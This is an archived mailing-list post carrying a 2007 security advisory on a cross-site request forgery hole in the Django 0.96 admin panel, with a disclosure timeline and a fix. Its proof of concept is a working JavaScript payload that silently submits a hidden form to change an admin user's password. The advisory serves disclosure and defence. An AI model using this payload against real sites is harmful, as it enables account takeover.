Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Django 0.96 (stable) Admin Panel CSRF

from [J. Carlos Nieto] Network Security [Permanent Link]
Subject: Django 0.96 (stable) Admin Panel CSRF
Date: Mon, 29 Oct 2007 17:29:36 -0600 

Author: J. Carlos Nieto.
Date: Oct 21, 2007

There exists a security hole in the default django's admin panel.

Background
==========
Django is a high-level Python Web framework that encourages rapid
development and clean, pragmatic design.
Django has an automatic admin panel that allows a person with admin
privileges to modify the database tables, it allows to change any user
password too.
See more at http://www.djangoproject.com

Summary
=======
django has, by default, no CSRF protection, this may allow an attacker
to change any user password by tricking a victim with admin privileges
into a special forged web page (even in a a totally different server)
that sends a request to change the password of the user with id = n. The
victim does not know that the form was sent. If the victim has admin
privileges the exploit will succeed, otherwise nothing will happen.

Severity
========
Mild. This problem exists only with the default installation and can be
easily solved using a middleware found in here:
http://www.djangoproject.com/documentation/csrf/.

Proof of concept
================
<script type="text/javascript">
window.onload = function() {
   var url = "http://127.0.0.1:8000/admin/auth/user/1/password/";;

   var pass = "funky";

   var param = {
       password1: pass,
       password2: pass
   };

   var form = document.createElement('form');
   form.action = url;
   form.method = 'post';
   form.target = 'hidden';
   form.style.display = 'none';

   for (var i in param) {
       try {
           // ie
           var input = document.createElement('<input name="'+i+'">');
       } catch(e) {
           // other browsers
           var input = document.createElement('input');
           input.name = i;
       }
       input.setAttribute('value',  param[i]);
       form.appendChild(input);
   }
   document.body.appendChild(form);

   form.submit();
}
</script>

<iframe name="hidden" style="display: none"></iframe>


Solution
========
Use the django's CSRF protection in all your applications. Take a look
at http://www.djangoproject.com/documentation/csrf/.


Disclosure Timeline
===================
2007.10.18 - Vulnerability found
2007.10.18 - Vulnerability reported to vendor
2007.10.18 - Vendor response
2007.10.21 - Advisory release

License
=======

Copyright 2007 J. Carlos Nieto

The contents of this document are licensed under the Creative Commons -
Attribution / Share Alike license.


[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Django 0.96 (stable) Admin Panel CSRF, J. Carlos Nieto <=
Previous by Date:  Secunia Research: IPSwitch IMail Server IMail Client Buffer Overflow, Secunia Research
Next by Date:  Airkiosk/formlib application is XSS vuln, skienlab
Previous by Thread:  Secunia Research: IPSwitch IMail Server IMail Client Buffer Overflow, Secunia Research
Next by Thread:  Airkiosk/formlib application is XSS vuln, skienlab
Indexes:  [Date] [Thread] [Top] [All Lists]